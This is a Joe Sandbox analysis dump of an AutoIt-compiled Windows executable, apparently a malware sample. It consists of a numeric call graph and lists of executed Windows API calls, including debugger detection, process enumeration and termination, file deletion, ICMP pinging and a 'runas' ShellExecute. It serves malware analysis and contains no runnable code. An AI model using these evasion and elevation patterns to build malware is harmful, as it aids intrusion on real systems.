98153->98159 98156 270340 207 API calls 98156->98157 98157->98136 98157->98137 98157->98140 98157->98142 98157->98149 98157->98150 98157->98156 98158 2b7c59 98157->98158 98411 2d3fe1 81 API calls __wsopen_s 98158->98411 98159->98151 98161 26bed9 8 API calls 98159->98161 98163 272dd7 messages 98159->98163 98161->98163 98162 273160 9 API calls 98162->98163 98163->98137 98163->98151 98163->98152 98163->98162 98166 272e8b messages 98163->98166 98184 2ead47 98163->98184 98189 27ac3e 98163->98189 98208 2df94a 98163->98208 98217 268bda 98163->98217 98292 2ea5b2 98163->98292 98298 2eee2f 98163->98298 98325 2e9ffc 98163->98325 98328 2d664c 98163->98328 98335 2e9fe8 98163->98335 98338 2e0fb8 98163->98338 98363 2ddf45 98163->98363 98164 272f2d 98164->98115 98166->98164 98404 27e322 8 API calls messages 98166->98404 98178->98115 98179->98109 98180->98110 98181->98109 98182->98109 98183->98109 98414 268ec0 98184->98414 98188 2ead72 98188->98163 98190 268ec0 52 API calls 98189->98190 98191 27ac68 98190->98191 98192 27bc58 8 API calls 98191->98192 98193 27ac7f 98192->98193 98197 27b09b _wcslen 98193->98197 98460 26c98d 39 API calls 98193->98460 98195 284d98 _strftime 40 API calls 98195->98197 98196 267ad5 8 API calls 98196->98197 98197->98195 98197->98196 98198 27b1fb 98197->98198 98200 27bbbe 43 API calls 98197->98200 98202 266c03 8 API calls 98197->98202 98203 268ec0 52 API calls 98197->98203 98204 268577 8 API calls 98197->98204 98205 26396b 60 API calls 98197->98205 98206 263907 Shell_NotifyIconW 98197->98206 98207 26c98d 39 API calls 98197->98207 98461 26ad40 8 API calls __fread_nolock 98197->98461 98462 267b1a 8 API calls 98197->98462 98198->98163 98200->98197 98202->98197 98203->98197 98204->98197 98205->98197 98206->98197 98207->98197 98209 28017b 8 API calls 98208->98209 98210 2df95b 98209->98210 98211 26423c 8 API calls 98210->98211 98212 2df965 98211->98212 98213 268ec0 52 API calls 98212->98213 98214 2df97c GetEnvironmentVariableW 98213->98214 98463 2d160f 8 API calls 98214->98463 98216 2df999 messages 98216->98163 98218 268ec0 52 API calls 98217->98218 98219 268bf9 98218->98219 98220 268ec0 52 API calls 98219->98220 98221 268c0e 98220->98221 98222 268ec0 52 API calls 98221->98222 98223 268c21 98222->98223 98224 268ec0 52 API calls 98223->98224 98225 268c37 98224->98225 98226 267ad5 8 API calls 98225->98226 98227 268c4b 98226->98227 98228 2a6767 98227->98228 98464 26c98d 39 API calls 98227->98464 98231 267e12 8 API calls 98228->98231 98230 268c72 98230->98228 98261 268c98 try_get_first_available_module 98230->98261 98232 2a6786 98231->98232 98233 268470 8 API calls 98232->98233 98234 2a6798 98233->98234 98237 268a60 8 API calls 98234->98237 98265 2a67bd 98234->98265 98235 267e12 8 API calls 98238 268d4e 98235->98238 98236 268ec0 52 API calls 98240 268d27 98236->98240 98237->98265 98241 2a6873 98238->98241 98242 268d5c 98238->98242 98239 268d3c 98239->98235 98246 268ec0 52 API calls 98240->98246 98244 2a68bc 98241->98244 98245 2a687d 98241->98245 98247 2a696e 98242->98247 98248 268d71 98242->98248 98253 268470 8 API calls 98244->98253 98252 268470 8 API calls 98245->98252 98246->98239 98251 268470 8 API calls 98247->98251 98249 268470 8 API calls 98248->98249 98255 268d79 98249->98255 98250 26893c 8 API calls 98250->98265 98256 2a697b 98251->98256 98257 2a6885 98252->98257 98254 2a68c5 98253->98254 98258 268a60 8 API calls 98254->98258 98259 26bd57 8 API calls 98255->98259 98262 268a60 8 API calls 98256->98262 98263 268ec0 52 API calls 98257->98263 98264 2a68e1 98258->98264 98287 268d91 try_get_first_available_module 98259->98287 98260 268a60 8 API calls 98260->98265 98261->98236 98261->98239 98261->98287 98262->98287 98266 2a6897 98263->98266 98270 268ec0 52 API calls 98264->98270 98265->98250 98265->98260 98290 268e71 98265->98290 98466 268844 8 API calls __fread_nolock 98265->98466 98467 268844 8 API calls __fread_nolock 98266->98467 98268 2a68ab 98271 26893c 8 API calls 98268->98271 98273 2a68fc 98270->98273 98274 2a68b9 98271->98274 98272 26893c 8 API calls 98272->98287 98468 268844 8 API calls __fread_nolock 98273->98468 98282 268a60 8 API calls 98274->98282 98275 2a69c1 98276 2a69f1 98275->98276 98278 2a69e5 98275->98278 98280 26893c 8 API calls 98276->98280 98469 26ad40 8 API calls __fread_nolock 98278->98469 98279 268a60 8 API calls 98279->98287 98284 2a69ff 98280->98284 98281 2a6910 98285 26893c 8 API calls 98281->98285 98282->98290 98288 268a60 8 API calls 98284->98288 98285->98274 98286 2a69ef 98287->98272 98287->98275 98287->98279 98287->98290 98465 268844 8 API calls __fread_nolock 98287->98465 98289 2a6a12 98288->98289 98291 26bd57 8 API calls 98289->98291 98290->98163 98291->98286 98296 2ea5c5 98292->98296 98293 268ec0 52 API calls 98294 2ea632 98293->98294 98470 2d18a9 98294->98470 98296->98293 98297 2ea5d4 98296->98297 98297->98163 98299 268ec0 52 API calls 98298->98299 98300 2eee4a 98299->98300 98301 267ad5 8 API calls 98300->98301 98302 2eee59 98301->98302 98303 2eee8d 98302->98303 98517 26c98d 39 API calls 98302->98517 98304 2681d6 8 API calls 98303->98304 98306 2eee96 98304->98306 98308 26b329 8 API calls 98306->98308 98307 2eee6a 98307->98303 98309 2eee6f 98307->98309 98312 2eeea4 98308->98312 98310 26bed9 8 API calls 98309->98310 98324 2eee7f 98309->98324 98310->98324 98314 2eeecc 98312->98314 98316 26bed9 8 API calls 98312->98316 98313 2eef8d 98313->98163 98315 26bf73 8 API calls 98314->98315 98319 2eeef9 98315->98319 98316->98314 98317 2eef30 98321 267bb5 8 API calls 98317->98321 98322 2eef4e 98317->98322 98319->98317 98320 266a7c 8 API calls 98319->98320 98511 2c99ff 98319->98511 98320->98319 98321->98317 98518 26839a 8 API calls 98322->98518 98519 267b1a 8 API calls 98324->98519 98521 2e89b6 98325->98521 98327 2ea00c 98327->98163 98329 268ec0 52 API calls 98328->98329 98330 2d6662 98329->98330 98610 2cdc54 98330->98610 98332 2d666a 98333 2d666e GetLastError 98332->98333 98334 2d6683 98332->98334 98333->98334 98334->98163 98336 2e89b6 119 API calls 98335->98336 98337 2e9ff8 98336->98337 98337->98163 98339 2e0fe1 98338->98339 98340 2e100f WSAStartup 98339->98340 98649 26c98d 39 API calls 98339->98649 98341 2e1054 98340->98341 98342 2e1023 messages 98340->98342 98636 27c1f6 98341->98636 98342->98163 98345 2e0ffc 98345->98340 98650 26c98d 39 API calls 98345->98650 98348 268ec0 52 API calls 98350 2e1069 98348->98350 98349 2e100b 98349->98340 98641 27f9d4 WideCharToMultiByte 98350->98641 98352 2e1075 inet_addr gethostbyname 98352->98342 98353 2e1093 IcmpCreateFile 98352->98353 98353->98342 98354 2e10d3 98353->98354 98355 28017b 8 API calls 98354->98355 98356 2e10ec 98355->98356 98357 26423c 8 API calls 98356->98357 98358 2e10f7 98357->98358 98359 2e112b IcmpSendEcho 98358->98359 98360 2e1102 IcmpSendEcho 98358->98360 98362 2e114c 98359->98362 98360->98362 98361 2e1212 IcmpCloseHandle WSACleanup 98361->98342 98362->98361 98364 26b4c8 8 API calls 98363->98364 98365 2ddf58 98364->98365 98653 2d1926 98365->98653 98367 2ddf60 98367->98163 98369 2e7b38 98368->98369 98370 2e7b52 98368->98370 98680 2d3fe1 81 API calls __wsopen_s 98369->98680 98673 2e60e6 98370->98673 98374 270340 206 API calls 98375 2e7bc1 98374->98375 98376 2e7c5c 98375->98376 98380 2e7c03 98375->98380 98403 2e7b4a 98375->98403 98377 2e7c62 98376->98377 98378 2e7cb0 98376->98378 98681 2d1ad8 8 API calls 98377->98681 98379 268ec0 52 API calls 98378->98379 98378->98403 98381 2e7cc2 98379->98381 98385 2d148b 8 API calls 98380->98385 98383 26c2c9 8 API calls 98381->98383 98386 2e7ce6 CharUpperBuffW 98383->98386 98384 2e7c85 98682 26bd07 8 API calls 98384->98682 98388 2e7c3b 98385->98388 98390 2e7d00 98386->98390 98389 272b20 206 API calls 98388->98389 98389->98403 98391 2e7d07 98390->98391 98392 2e7d53 98390->98392 98396 2d148b 8 API calls 98391->98396 98393 268ec0 52 API calls 98392->98393 98394 2e7d5b 98393->98394 98683 27aa65 9 API calls 98394->98683 98397 2e7d35 98396->98397 98398 272b20 206 API calls 98397->98398 98398->98403 98399 2e7d65 98400 268ec0 52 API calls 98399->98400 98399->98403 98401 2e7d80 98400->98401 98684 26bd07 8 API calls 98401->98684 98403->98125 98404->98166 98405->98123 98406->98132 98407->98152 98408->98152 98409->98137 98410->98137 98411->98137 98412->98159 98413->98137 98415 268ed5 98414->98415 98431 268ed2 98414->98431 98416 268edd 98415->98416 98417 268f0b 98415->98417 98447 285536 26 API calls 98416->98447 98420 268f1d 98417->98420 98426 2a6b1f 98417->98426 98429 2a6a38 98417->98429 98448 27fe6f 51 API calls 98420->98448 98421 268eed 98424 28014b 8 API calls 98421->98424 98422 2a6b37 98422->98422 98427 268ef7 98424->98427 98450 2854f3 26 API calls 98426->98450 98428 26b329 8 API calls 98427->98428 98428->98431 98430 28017b 8 API calls 98429->98430 98436 2a6ab1 98429->98436 98432 2a6a81 98430->98432 98437 2cdd87 CreateToolhelp32Snapshot Process32FirstW 98431->98437 98433 28014b 8 API calls 98432->98433 98434 2a6aa8 98433->98434 98435 26b329 8 API calls 98434->98435 98435->98436 98449 27fe6f 51 API calls 98436->98449 98451 2ce80e 98437->98451 98439 2cddd4 Process32NextW 98440 2cde86 CloseHandle 98439->98440 98446 2cddcd 98439->98446 98440->98188 98441 26bf73 8 API calls 98441->98446 98442 26b329 8 API calls 98442->98446 98443 26568e 8 API calls 98443->98446 98444 267bb5 8 API calls 98444->98446 98446->98439 98446->98440 98446->98441 98446->98442 98446->98443 98446->98444 98457 27e36b 41 API calls 98446->98457 98447->98421 98448->98421 98449->98426 98450->98422 98456 2ce819 98451->98456 98452 2ce830 98459 28666b 39 API calls _strftime 98452->98459 98455 2ce836 98455->98446 98456->98452 98456->98455 98458 286722 GetStringTypeW _strftime 98456->98458 98457->98446 98458->98456 98459->98455 98460->98197 98461->98197 98462->98197 98463->98216 98464->98230 98465->98287 98466->98265 98467->98268 98468->98281 98469->98286 98471 2d18b6 98470->98471 98472 28014b 8 API calls 98471->98472 98473 2d18bd 98472->98473 98476 2cfcb5 98473->98476 98475 2d18f7 98475->98297 98477 26c2c9 8 API calls 98476->98477 98478 2cfcc8 CharLowerBuffW 98477->98478 98480 2cfcdb 98478->98480 98479 26655e 8 API calls 98479->98480 98480->98479 98481 2cfd19 98480->98481 98493 2cfce5 ___scrt_fastfail 98480->98493 98482 2cfd2b 98481->98482 98483 26655e 8 API calls 98481->98483 98484 28017b 8 API calls 98482->98484 98483->98482 98487 2cfd59 98484->98487 98489 2cfd7b 98487->98489 98509 2cfbed 8 API calls 98487->98509 98488 2cfdb8 98490 28014b 8 API calls 98488->98490 98488->98493 98494 2cfe0c 98489->98494 98491 2cfdd2 98490->98491 98492 28017b 8 API calls 98491->98492 98492->98493 98493->98475 98495 26bf73 8 API calls 98494->98495 98496 2cfe3e 98495->98496 98497 26bf73 8 API calls 98496->98497 98498 2cfe47 98497->98498 98499 26bf73 8 API calls 98498->98499 98502 2cfe50 98499->98502 98500 268577 8 API calls 98500->98502 98501 2d0114 98501->98488 98502->98500 98502->98501 98503 26ad40 8 API calls 98502->98503 98504 2866f8 GetStringTypeW 98502->98504 98506 286641 39 API calls 98502->98506 98507 2cfe0c 40 API calls 98502->98507 98508 26bed9 8 API calls 98502->98508 98510 286722 GetStringTypeW _strftime 98502->98510 98503->98502 98504->98502 98506->98502 98507->98502 98508->98502 98509->98487 98510->98502 98512 2c9a0a 98511->98512 98514 2c9a18 98511->98514 98513 26adf4 8 API calls 98512->98513 98516 2c9a16 98513->98516 98520 268844 8 API calls __fread_nolock 98514->98520 98516->98319 98517->98307 98518->98324 98519->98313 98520->98516 98522 268ec0 52 API calls 98521->98522 98523 2e89ed 98522->98523 98547 2e8a32 messages 98523->98547 98559 2e9730 98523->98559 98525 2e8cde 98526 2e8eac 98525->98526 98530 2e8cec 98525->98530 98597 2e9941 59 API calls 98526->98597 98529 2e8ebb 98529->98530 98531 2e8ec7 98529->98531 98572 2e88e3 98530->98572 98531->98547 98532 268ec0 52 API calls 98550 2e8aa6 98532->98550 98537 2e8d25 98586 27ffe0 98537->98586 98540 2e8d5f 98542 267e12 8 API calls 98540->98542 98541 2e8d45 98593 2d3fe1 81 API calls __wsopen_s 98541->98593 98544 2e8d6e 98542->98544 98546 268470 8 API calls 98544->98546 98545 2e8d50 GetCurrentProcess TerminateProcess 98545->98540 98548 2e8d87 98546->98548 98547->98327 98558 2e8daf 98548->98558 98594 271ca0 8 API calls 98548->98594 98550->98525 98550->98532 98550->98547 98591 2c4ad3 8 API calls __fread_nolock 98550->98591 98592 2e8f7a 41 API calls _strftime 98550->98592 98551 2e8f22 98551->98547 98553 2e8f36 FreeLibrary 98551->98553 98552 2e8d9e 98595 2e95d8 74 API calls 98552->98595 98553->98547 98557 26b4c8 8 API calls 98557->98558 98558->98551 98558->98557 98596 271ca0 8 API calls 98558->98596 98598 2e95d8 74 API calls 98558->98598 98560 26c2c9 8 API calls 98559->98560 98561 2e974b CharLowerBuffW 98560->98561 98599 2c9805 98561->98599 98565 26bf73 8 API calls 98566 2e9787 98565->98566 98567 26acc0 8 API calls 98566->98567 98568 2e979b 98567->98568 98569 26adf4 8 API calls 98568->98569 98571 2e97a5 _wcslen 98569->98571 98570 2e98bb _wcslen 98570->98550 98571->98570 98606 2e8f7a 41 API calls _strftime 98571->98606 98573 2e88fe 98572->98573 98574 2e8949 98572->98574 98575 28017b 8 API calls 98573->98575 98578 2e9af3 98574->98578 98576 2e8920 98575->98576 98576->98574 98577 28014b 8 API calls 98576->98577 98577->98576 98579 2e9d08 messages 98578->98579 98584 2e9b17 _strcat _wcslen ___std_exception_copy 98578->98584 98579->98537 98580 26c63f 39 API calls 98580->98584 98581 26c98d 39 API calls 98581->98584 98582 26ca5b 39 API calls 98582->98584 98583 268ec0 52 API calls 98583->98584 98584->98579 98584->98580 98584->98581 98584->98582 98584->98583 98609 2cf8c5 10 API calls _wcslen 98584->98609 98587 27fff5 98586->98587 98588 28008d SetErrorMode 98587->98588 98589 28007b CloseHandle 98587->98589 98590 28005b 98587->98590 98588->98590 98589->98590 98590->98540 98590->98541 98591->98550 98592->98550 98593->98545 98594->98552 98595->98558 98596->98558 98597->98529 98598->98558 98600 2c9825 _wcslen 98599->98600 98601 2c9914 98600->98601 98604 2c985a 98600->98604 98605 2c9919 98600->98605 98601->98565 98601->98571 98604->98601 98607 27e36b 41 API calls 98604->98607 98605->98601 98608 27e36b 41 API calls 98605->98608 98606->98570 98607->98604 98608->98605 98609->98584 98611 26bf73 8 API calls 98610->98611 98612 2cdc73 98611->98612 98613 26bf73 8 API calls 98612->98613 98614 2cdc7c 98613->98614 98615 26bf73 8 API calls 98614->98615 98616 2cdc85 98615->98616 98617 265851 9 API calls 98616->98617 98618 2cdc90 98617->98618 98634 2ceab0 GetFileAttributesW 98618->98634 98621 2cdcab 98623 26568e 8 API calls 98621->98623 98622 266b7c 8 API calls 98622->98621 98624 2cdcbf FindFirstFileW 98623->98624 98625 2cdd4b FindClose 98624->98625 98628 2cdcde 98624->98628 98629 2cdd56 98625->98629 98626 2cdd26 FindNextFileW 98626->98628 98627 26bed9 8 API calls 98627->98628 98628->98625 98628->98626 98628->98627 98630 267bb5 8 API calls 98628->98630 98631 266b7c 8 API calls 98628->98631 98629->98332 98630->98628 98632 2cdd17 DeleteFileW 98631->98632 98632->98626 98633 2cdd42 FindClose 98632->98633 98633->98629 98635 2cdc99 98634->98635 98635->98621 98635->98622 98637 28017b 8 API calls 98636->98637 98638 27c209 98637->98638 98639 28014b 8 API calls 98638->98639 98640 27c215 98639->98640 98640->98348 98642 27fa35 98641->98642 98643 27f9fe 98641->98643 98652 27fe8a 8 API calls 98642->98652 98645 28017b 8 API calls 98643->98645 98647 27fa05 WideCharToMultiByte 98645->98647 98646 27fa29 98646->98352 98651 27fa3e 8 API calls __fread_nolock 98647->98651 98649->98345 98650->98349 98651->98646 98652->98646 98654 2d193d 98653->98654 98671 2d1a56 98653->98671 98655 2d198a 98654->98655 98656 2d195d 98654->98656 98659 2d19a1 98654->98659 98657 28017b 8 API calls 98655->98657 98656->98655 98660 2d1971 98656->98660 98658 2d197f __fread_nolock 98657->98658 98667 28014b 8 API calls 98658->98667 98662 28017b 8 API calls 98659->98662 98665 2d19be 98659->98665 98663 28017b 8 API calls 98660->98663 98661 2d19e5 98664 28017b 8 API calls 98661->98664 98662->98665 98663->98658 98666 2d19eb 98664->98666 98665->98658 98665->98660 98665->98661 98672 27c277 8 API calls 98666->98672 98667->98671 98669 2d19f7 98670 27f9d4 10 API calls 98669->98670 98670->98658 98671->98367 98672->98669 98674 2e6101 98673->98674 98679 2e614f 98673->98679 98675 28017b 8 API calls 98674->98675 98677 2e6123 98675->98677 98676 28014b 8 API calls 98676->98677 98677->98676 98677->98679 98685 2d1400 8 API calls 98677->98685 98679->98374 98680->98403 98681->98384 98682->98403 98683->98399 98684->98403 98685->98677 98686 26f4dc 98687 26cab0 207 API calls 98686->98687 98688 26f4ea 98687->98688 98689 2b5650 98698 27e3d5 98689->98698 98691 2b5666 98693 2b56e1 98691->98693 98707 27aa65 9 API calls 98691->98707 98696 2b61d7 98693->98696 98709 2d3fe1 81 API calls __wsopen_s 98693->98709 98695 2b56c1 98695->98693 98708 2d247e 8 API calls 98695->98708 98699 27e3f6 98698->98699 98700 27e3e3 98698->98700 98702 27e3fb 98699->98702 98703 27e429 98699->98703 98701 26b4c8 8 API calls 98700->98701 98706 27e3ed 98701->98706 98704 28014b 8 API calls 98702->98704 98705 26b4c8 8 API calls 98703->98705 98704->98706 98705->98706 98706->98691 98707->98695 98708->98693 98709->98696 98710 26dd3d 98711 26dd63 98710->98711 98712 2b19c2 98710->98712 98713 26dead 98711->98713 98716 28014b 8 API calls 98711->98716 98715 2b1a82 98712->98715 98720 2b1a26 98712->98720 98723 2b1a46 98712->98723 98717 28017b 8 API calls 98713->98717 98770 2d3fe1 81 API calls __wsopen_s 98715->98770 98722 26dd8d 98716->98722 98728 26dee4 __fread_nolock 98717->98728 98718 2b1a7d 98768 27e6e8 207 API calls 98720->98768 98724 28014b 8 API calls 98722->98724 98722->98728 98723->98718 98769 2d3fe1 81 API calls __wsopen_s 98723->98769 98725 26dddb 98724->98725 98725->98720 98727 26de16 98725->98727 98726 28017b 8 API calls 98726->98728 98729 270340 207 API calls 98727->98729 98728->98723 98728->98726 98730 26de29 98729->98730 98730->98718 98730->98728 98731 2b1aa5 98730->98731 98732 26de77 98730->98732 98734 26d526 98730->98734 98771 2d3fe1 81 API calls __wsopen_s 98731->98771 98732->98713 98732->98734 98735 28014b 8 API calls 98734->98735 98736 26d589 98735->98736 98752 26c32d 98736->98752 98739 28014b 8 API calls 98743 26d66e messages 98739->98743 98740 26c3ab 8 API calls 98750 26d9ac messages 98740->98750 98741 26b4c8 8 API calls 98741->98743 98743->98741 98744 2b1f79 98743->98744 98746 2b1f94 98743->98746 98747 26bed9 8 API calls 98743->98747 98749 26d911 messages 98743->98749 98759 26c3ab 98743->98759 98772 2c56ae 8 API calls messages 98744->98772 98747->98743 98749->98740 98749->98750 98751 26d9c3 98750->98751 98767 27e30a 8 API calls messages 98750->98767 98756 26c33d 98752->98756 98753 26c345 98753->98739 98754 28014b 8 API calls 98754->98756 98755 26bf73 8 API calls 98755->98756 98756->98753 98756->98754 98756->98755 98757 26bed9 8 API calls 98756->98757 98758 26c32d 8 API calls 98756->98758 98757->98756 98758->98756 98760 26c3b9 98759->98760 98766 26c3e1 messages 98759->98766 98761 26c3c7 98760->98761 98762 26c3ab 8 API calls 98760->98762 98763 26c3cd 98761->98763 98764 26c3ab 8 API calls 98761->98764 98762->98761 98763->98766 98773 26c7e0 8 API calls messages 98763->98773 98764->98763 98766->98743 98767->98750 98768->98723 98769->98718 98770->98718 98771->98718 98772->98746 98773->98766 98774 27235c 98783 272365 __fread_nolock 98774->98783 98775 268ec0 52 API calls 98775->98783 98776 2b74e3 98786 2c13c8 8 API calls __fread_nolock 98776->98786 98778 2b74ef 98782 26bed9 8 API calls 98778->98782 98784 271ff7 __fread_nolock 98778->98784 98779 2723b6 98780 267d74 8 API calls 98779->98780 98780->98784 98781 28014b 8 API calls 98781->98783 98782->98784 98783->98775 98783->98776 98783->98779 98783->98781 98783->98784 98785 28017b 8 API calls 98783->98785 98785->98783 98786->98778 98787 26105b 98792 2652a7 98787->98792 98789 26106a 98823 280413 29 API calls __onexit 98789->98823 98791 261074 98793 2652b7 __wsopen_s 98792->98793 98794 26bf73 8 API calls 98793->98794 98795 26536d 98794->98795 98796 265594 10 API calls 98795->98796 98797 265376 98796->98797 98824 265238 98797->98824 98800 266b7c 8 API calls 98801 26538f 98800->98801 98802 266a7c 8 API calls 98801->98802 98803 26539e 98802->98803 98804 26bf73 8 API calls 98803->98804 98805 2653a7 98804->98805 98806 26bd57 8 API calls 98805->98806 98807 2653b0 RegOpenKeyExW 98806->98807 98808 2a4be6 RegQueryValueExW 98807->98808 98813 2653d2 98807->98813 98809 2a4c7c RegCloseKey 98808->98809 98810 2a4c03 98808->98810 98809->98813 98820 2a4c8e _wcslen 98809->98820 98811 28017b 8 API calls 98810->98811 98812 2a4c1c 98811->98812 98814 26423c 8 API calls 98812->98814 98813->98789 98815 2a4c27 RegQueryValueExW 98814->98815 98817 2a4c44 98815->98817 98819 2a4c5e messages 98815->98819 98816 26655e 8 API calls 98816->98820 98818 268577 8 API calls 98817->98818 98818->98819 98819->98809 98820->98813 98820->98816 98821 26b329 8 API calls 98820->98821 98822 266a7c 8 API calls 98820->98822 98821->98820 98822->98820 98823->98791 98825 2a22d0 __wsopen_s 98824->98825 98826 265245 GetFullPathNameW 98825->98826 98827 265267 98826->98827 98828 268577 8 API calls 98827->98828 98829 265285 98828->98829 98829->98800 98830 261098 98835 265fc8 98830->98835 98834 2610a7 98836 26bf73 8 API calls 98835->98836 98837 265fdf GetVersionExW 98836->98837 98838 268577 8 API calls 98837->98838 98839 26602c 98838->98839 98840 26adf4 8 API calls 98839->98840 98854 266062 98839->98854 98841 266056 98840->98841 98843 2655dc 8 API calls 98841->98843 98842 26611c GetCurrentProcess IsWow64Process 98844 266138 98842->98844 98843->98854 98845 2a5269 GetSystemInfo 98844->98845 98846 266150 LoadLibraryA 98844->98846 98847 266161 GetProcAddress 98846->98847 98848 26619d GetSystemInfo 98846->98848 98847->98848 98850 266171 GetNativeSystemInfo 98847->98850 98851 266177 98848->98851 98849 2a5224 98850->98851 98852 26109d 98851->98852 98853 26617b FreeLibrary 98851->98853 98855 280413 29 API calls __onexit 98852->98855 98853->98852 98854->98842 98854->98849 98855->98834

                                                                                                                                                                        Executed Functions

                                                                                                                                                                        Function 00265FC8 Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 236libraryloaderCOMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 224 265fc8-266037 call 26bf73 GetVersionExW call 268577 229 2a507d-2a5090 224->229 230 26603d 224->230 232 2a5091-2a5095 229->232 231 26603f-266041 230->231 233 266047-2660a6 call 26adf4 call 2655dc 231->233 234 2a50bc 231->234 235 2a5098-2a50a4 232->235 236 2a5097 232->236 249 2660ac-2660ae 233->249 250 2a5224-2a522b 233->250 240 2a50c3-2a50cf 234->240 235->232 237 2a50a6-2a50a8 235->237 236->235 237->231 239 2a50ae-2a50b5 237->239 239->229 242 2a50b7 239->242 243 26611c-266136 GetCurrentProcess IsWow64Process 240->243 242->234 245 266195-26619b 243->245 246 266138 243->246 248 26613e-26614a 245->248 246->248 251 2a5269-2a526d GetSystemInfo 248->251 252 266150-26615f LoadLibraryA 248->252 255 2660b4-2660b7 249->255 256 2a5125-2a5138 249->256 253 2a524b-2a524e 250->253 254 2a522d 250->254 259 266161-26616f GetProcAddress 252->259 260 26619d-2661a7 GetSystemInfo 252->260 257 2a5239-2a5241 253->257 258 2a5250-2a525f 253->258 264 2a5233 254->264 255->243 261 2660b9-2660f5 255->261 262 2a513a-2a5143 256->262 263 2a5161-2a5163 256->263 257->253 258->264 267 2a5261-2a5267 258->267 259->260 268 266171-266175 GetNativeSystemInfo 259->268 269 266177-266179 260->269 261->243 270 2660f7-2660fa 261->270 271 2a5150-2a515c 262->271 272 2a5145-2a514b 262->272 265 2a5198-2a519b 263->265 266 2a5165-2a517a 263->266 264->257 275 2a519d-2a51b8 265->275 276 2a51d6-2a51d9 265->276 273 2a517c-2a5182 266->273 274 2a5187-2a5193 266->274 267->257 268->269 277 266182-266194 269->277 278 26617b-26617c FreeLibrary 269->278 279 266100-26610a 270->279 280 2a50d4-2a50e4 270->280 271->243 272->243 273->243 274->243 282 2a51ba-2a51c0 275->282 283 2a51c5-2a51d1 275->283 276->243 284 2a51df-2a5206 276->284 278->277 279->240 281 266110-266116 279->281 285 2a50e6-2a50f2 280->285 286 2a50f7-2a5101 280->286 281->243 282->243 283->243 287 2a5208-2a520e 284->287 288 2a5213-2a521f 284->288 285->243 289 2a5103-2a510f 286->289 290 2a5114-2a5120 286->290 287->243 288->243 289->243 290->243
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetVersionExW.KERNEL32(?), ref: 00265FF7
                                                                                                                                                                          • Part of subcall function 00268577: _wcslen.LIBCMT ref: 0026858A
                                                                                                                                                                        • GetCurrentProcess.KERNEL32(?,002FDC2C,00000000,?,?), ref: 00266123
                                                                                                                                                                        • IsWow64Process.KERNEL32(00000000,?,?), ref: 0026612A
                                                                                                                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00266155
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00266167
                                                                                                                                                                        • GetNativeSystemInfo.KERNEL32(?,?,?), ref: 00266175
                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,?), ref: 0026617C
                                                                                                                                                                        • GetSystemInfo.KERNEL32(?,?,?), ref: 002661A1
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
                                                                                                                                                                        • String ID: GetNativeSystemInfo$kernel32.dll$|O
                                                                                                                                                                        • API String ID: 3290436268-3101561225
                                                                                                                                                                        • Opcode ID: b61fea44e3781e6881753cb1839f1c155238e1a33e0e2be575aca8ace0313c42
                                                                                                                                                                        • Instruction ID: 2a166295c5c8a8bcf31ba494d652d8fa6ed676ad4b4a25086bf5bf488af52d25
                                                                                                                                                                        • Opcode Fuzzy Hash: b61fea44e3781e6881753cb1839f1c155238e1a33e0e2be575aca8ace0313c42
                                                                                                                                                                        • Instruction Fuzzy Hash: 63A1A63992A2E5CFC713CB687CC51A77F6D6B27320F0848A9E44597322C67D4598CB31
                                                                                                                                                                        Function 0026338B Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 148windowCOMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        APIs
                                                                                                                                                                        • GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,00263368,?), ref: 002633BB
                                                                                                                                                                        • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,00263368,?), ref: 002633CE
                                                                                                                                                                        • GetFullPathNameW.KERNEL32(00007FFF,?,?,00332418,00332400,?,?,?,?,?,?,00263368,?), ref: 0026343A
                                                                                                                                                                          • Part of subcall function 00268577: _wcslen.LIBCMT ref: 0026858A
                                                                                                                                                                          • Part of subcall function 0026425F: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00263462,00332418,?,?,?,?,?,?,?,00263368,?), ref: 002642A0
                                                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?,00000001,00332418,?,?,?,?,?,?,?,00263368,?), ref: 002634BB
                                                                                                                                                                        • MessageBoxA.USER32(00000000,It is a violation of the AutoIt EULA to attempt to reverse engineer this program.,AutoIt,00000010), ref: 002A3CB0
                                                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?,00332418,?,?,?,?,?,?,?,00263368,?), ref: 002A3CF1
                                                                                                                                                                        • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,003231F4,00332418,?,?,?,?,?,?,?,00263368), ref: 002A3D7A
                                                                                                                                                                        • ShellExecuteW.SHELL32(00000000,?,?), ref: 002A3D81
                                                                                                                                                                          • Part of subcall function 002634D3: GetSysColorBrush.USER32(0000000F), ref: 002634DE
